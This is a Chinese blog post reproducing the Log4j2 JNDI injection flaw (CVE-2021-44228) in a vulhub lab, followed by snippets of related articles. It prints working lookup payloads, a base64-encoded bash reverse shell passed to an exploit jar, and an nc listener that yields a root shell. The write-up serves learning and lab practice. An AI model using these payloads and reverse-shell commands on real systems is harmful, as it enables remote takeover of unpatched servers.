[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)

最新推荐文章于 2024-07-23 17:23:54 发布
最新推荐文章于 2024-07-23 17:23:54 发布
阅读量3.7k 收藏 21
点赞数 9
分类专栏: 网安 文章标签: 学习 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46145027/article/details/124661480
版权

刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。

影响版本:log4j 2.x <= 2.14.1

一、log4j2漏洞相关知识介绍

漏洞简介

首先肯定得简单了解一下log4j2到底是什么东西,log4j2是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。

至于漏洞原理,简单说就是当你使用log4j2中提供的方法去输出日志信息时,比如说最常见的:

String a = "变量输入" 
LOGGER.info("日志信息:{}",a);

我们通过这样的语句输出了一句日志信息,其中{}的部分由我们传进去的变量决定,当然一般我们传进去的都是一些很普通的语句,所以不会出什么问题。但如果我们往里面传一些别的代码呢,比如传一个${java.os}这样的语句,执行后可以看到:

可以看到它执行了java.os的内容把我们操作系统的信息显示出来了,看到这里很多人立马想到:这里可能会存在注入攻击,类似我们熟悉的XSS注入、SQL注入等等。当然这里输入的信息因为是日志的信息,用户是看不到的,所以显示了也没啥影响,但是实际上这里是存在着JNID注入的。

JNDI注入简单介绍

JNDI,中文名叫java命名和目录接口,它为我们提供了命名和目录服务,具体就不多讲了。主要是JNDI其中有一个lookup()方法,这是一个查找方法,上面代码执行结果也正是因为log4j2在获取到${}这样的格式的时候会自动的去调用lookup()方法。而这个方法的可怕之处就在于,它可以远程加载对象,比如我们传一个像:

lookup("rmi://127.0.0.1/test")
lookup("ldap://127.0.0.1/test")

这样的参数进去,它就可以远程访问到我们(黑客)本地的类,那如果这些类里面有恶意代码的话造成的危害显然是非常严重的。

二、在vulhub进行漏洞复现流程详解

首先启动docker,然后进入漏洞环境目录:

启动容器,查看端口并从浏览器进入: 

 docker-compose up -d

 环境网站就是这个样子:

下面正式开始漏洞的复现!我们先在dnslog.cn获取一个域名来监控我们注入的效果。 

 首先肯定要有一个注入点,我们可以发现/solr/admin/cores?这里有个参数可以传,可以按照上面的原理先构造一个请求传过去:

cores?action=${jndi:ldap://${sys:java.version}.wixour.dnslog.cn}

存在JNDI注入那么ldap服务端会执行我们传上去的payload然后在dnslog.cn那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号:

 当然我们肯定不会只用这个漏洞来读java版本号,接下来我们尝试利用漏洞进行命令执行。

反弹shell漏洞利用:

用到github上的一个JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,项目地址:

sayers522/JNDI-Injection-Exploit: JNDI命令注入利用 (github.com)

下下来之后把它打包成jar包,这里我是直接网上找了一个现成的JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,找起来应该也很方便。

开始漏洞利用,首先我们构造反弹shell用到的命令:

bash -i >& /dev/tcp/传反弹shell的主机ip/端口号 0>&1

这里我直接用的当前虚拟机的ip,端口号随便输一个,反弹shell需要经过编码,所以我们对上面那段命令base64加密。

 加密完毕后把结果复制下来,构造payload,输入如下命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuMTUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "10.0.2.15" 

-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。

 

可以看到有三个服务,看到熟悉的rmi和ldap,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入:

在注入之前另起一个终端,监控刚刚的那个端口,这里是6666:

nc -lvvp 端口号

然后就回到刚才的页面,构造url:

/solr/admin/cores?action=${jndi:ldap://10.0.2.15:1389/zjla02}

直接访问 :

我们可以看到网页被重定向到了我们的恶意类地址:

 

去另外一个监控终端看看shell有没有弹回来:

 

弹回来了,用whoami命令查看权限,发现已经成功获取到root权限了。大功告成。 

以上就是在vulhub环境下复现log4j4漏洞的全过程,也算是边学边做,通过这次复现熟悉了JNDI注入的原理利用,其实原理并不难,但在如今还会爆出如此严重的漏洞,只能说网络安全还是仍重而道远。

plexming
关注
专栏目录
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
m0_57540655的博客
04-18 1123
我第一次复现的时候,直接用了JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar或JNDIExploit-1.4-SNAPSHOT.jar,可以在github上搜一下(后文会介绍),但我写博客的时候考虑到用这种工具感觉像是一键复现漏洞,对漏洞利用的每个步骤好像并不是很明确,所以我们还是先不用这种方法,还是老老实实自己编写一下恶意代码,启动一下恶意的http服务站点和LDAP服务,完整的演示一下过程。接下来,我们在攻击机启动LDAP服务。
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2441
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
vulhubLog4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2963
vulhubLog4j2CVE-2021-44228漏洞复现
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 1997
vulhub漏洞复现练习篇
vulhub漏洞复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞
RexHa的博客
03-01 2305
一、漏洞详情Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。JNDI注入漏洞JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1291
vulhub-log4j漏洞复现
log4j2漏洞原理分析及复现-CVE-2021-44228vulfocus靶场)
yang1234567898的博客
04-18 3218
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1481
LOG4J2(CVE-2021-44228)vulhub复现
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 671
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 992
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
热门推荐
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
【vluhub】log4j注入漏洞 CVE-2021-44228
yh
07-23 1139
log4j漏洞复现vulhub搭建
Vulhub靶场-Log4j2
weixin_69010236的博客
01-24 1267
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 761
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4290
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
[CVE-2021-44228]:log4j2漏洞复现流程详解vulhub环境
weixin_45441024的博客
04-23 413
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
Apache Log4j2是一个广泛使用的日志框架,用于Java应用程序的日志记录。CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以构造恶意的控制字符序列,使得日志处理器执行任意的Java代码,从而实现了远程代码执行。 攻击者可以通过受影响的应用程序访问的日志系统接口,将恶意脚本插入到日志消息中。如果应用服务器配置不当,比如默认开启了对用户提交日志的解析功能,就可能导致这种漏洞被利用,攻击者可以窃取敏感信息,甚至完全控制受影响的系统。 修复此漏洞通常需要更新到最新的Log4j2版本,并确保适当的安全配置,例如禁用不受信任的特性或者关闭日志处理器的功能。同时,也应该检查并修复所有可能受到漏洞影响的服务和组件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值